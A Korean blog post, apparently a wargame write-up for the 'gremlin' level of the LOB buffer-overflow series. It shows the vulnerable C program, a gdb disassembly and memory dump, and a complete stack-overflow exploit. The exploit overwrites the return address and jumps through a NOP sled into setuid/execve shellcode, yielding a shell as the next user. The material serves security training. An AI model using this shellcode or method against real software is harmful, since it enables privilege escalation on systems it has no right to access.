시작
두 번째 몬스터인 gremlin 입니다!!
..라곤 했지만 gate와 풀이 방법이 아예 똑같아서..
제작자님 의도는 buf 배열 사이즈가 작아졌으니 buf에 쉘코드를 저장하지 말고 풀어!! 인 것 같은데..
저는 nop 썰매를 타고 가겠습니다 ㅎ..
Write UP
gate와 풀이방법이 아예 동일하기 때문에 코드로 바로 가겠습니다.
[gremlin@localhost gremlin]$ ll
total 16
-rwsr-sr-x 1 cobolt cobolt 11970 Feb 26 2010 cobolt
-rw-r--r-- 1 gremlin gremlin 291 Mar 29 2010 cobolt.c
[gremlin@localhost gremlin]$ cat cobolt.c
/*
The Lord of the BOF : The Fellowship of the BOF
- cobolt
- small buffer
*/
int main(int argc, char *argv[])
{
char buffer[16];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[gremlin@localhost gremlin]$ gdb -q /tmp/cobolt
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 : push %ebp
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,16
0x8048436 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804843a <main+10>: jg 0x8048453 <main+35>
0x804843c <main+12>: push 0x80484d0
0x8048441 <main+17>: call 0x8048350
0x8048446 <main+22>: add %esp,4
0x8048449 <main+25>: push 0
0x804844b <main+27>: call 0x8048360
0x8048450 <main+32>: add %esp,4
0x8048453 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>: add %eax,4
0x8048459 <main+41>: mov %edx,DWORD PTR [%eax]
0x804845b <main+43>: push %edx
0x804845c <main+44>: lea %eax,[%ebp-16]
0x804845f <main+47>: push %eax
0x8048460 <main+48>: call 0x8048370
0x8048465 <main+53>: add %esp,8
0x8048468 <main+56>: lea %eax,[%ebp-16]
0x804846b <main+59>: push %eax
0x804846c <main+60>: push 0x80484dc
0x8048471 <main+65>: call 0x8048350
0x8048476 <main+70>: add %esp,8
0x8048479 <main+73>: leave
0x804847a <main+74>: ret
0x804847b <main+75>: nop
0x804847c <main+76>: nop
0x804847d <main+77>: nop
0x804847e <main+78>: nop
0x804847f <main+79>: nop
End of assembler dump.
(gdb) b *main+53
Breakpoint 1 at 0x8048465
(gdb) r `python -c 'print "A" * 20 + "BBBB" + "\x90" * 100 + "CCCC"'`
Starting program: /tmp/cobolt `python -c 'print "A" * 20 + "BBBB" + "\x90" * 100 + "CCCC"'`
Breakpoint 1, 0x8048465 in main ()
(gdb) x/100wx $ebp-16
0xbffffaa8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffab8: 0x41414141 0x42424242 0x90909090 0x90909090
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb18: 0x90909090 0x90909090 0x90909090 0x43434343
0xbffffb28: 0xbffffe00 0xbffffee3 0xbffffef8 0xbfffff17
0xbffffb38: 0xbfffff22 0xbfffff32 0xbfffff3a 0xbfffff4b
0xbffffb48: 0xbfffff55 0xbfffff63 0xbfffff74 0xbfffff82
0xbffffb58: 0xbfffff8d 0xbfffffa0 0x00000000 0x00000003
0xbffffb68: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb78: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb88: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb98: 0x08048380 0x0000000b 0x000001f5 0x0000000c
0xbffffba8: 0x000001f5 0x0000000d 0x000001f5 0x0000000e
0xbffffbb8: 0x000001f5 0x00000010 0x0f8bfbff 0x0000000f
0xbffffbc8: 0xbffffbf2 0x00000000 0x00000000 0x00000000
0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe8: 0x00000000 0x00000000 0x36690000 0x2f003638
0xbffffbf8: 0x2f706d74 0x6f626f63 0x4100746c 0x41414141
0xbffffc08: 0x41414141 0x41414141 0x41414141 0x42414141
0xbffffc18: 0x90424242 0x90909090 0x90909090 0x90909090
0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "A" * 20 + "\xd8\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀1▒̀
bash$ whoami
cobolt
bash$ /bin/my-paps
sh: /bin/my-paps: No such file or directory
bash$ /bin/my-pass
euid = 502
hacking exposed
Exploit!
마무리
어.. 뭔가 숨겨진 게 있을 줄 알았더니 gate와 똑같았네요ㅋㅋㅋㅋ
자세한 설명은 gate에서!! 저는 다음 레벨로 가겠습니다!!
'CTF_Write_UP > LOB' 카테고리의 다른 글
| [LOB] wolfman (0) | 2019.05.09 |
|---|---|
| [LOB] orc (0) | 2019.05.09 |
| [LOB] goblin (0) | 2019.05.08 |
| [LOB] cobolt (0) | 2019.05.05 |
| [LOB] gate (0) | 2019.05.04 |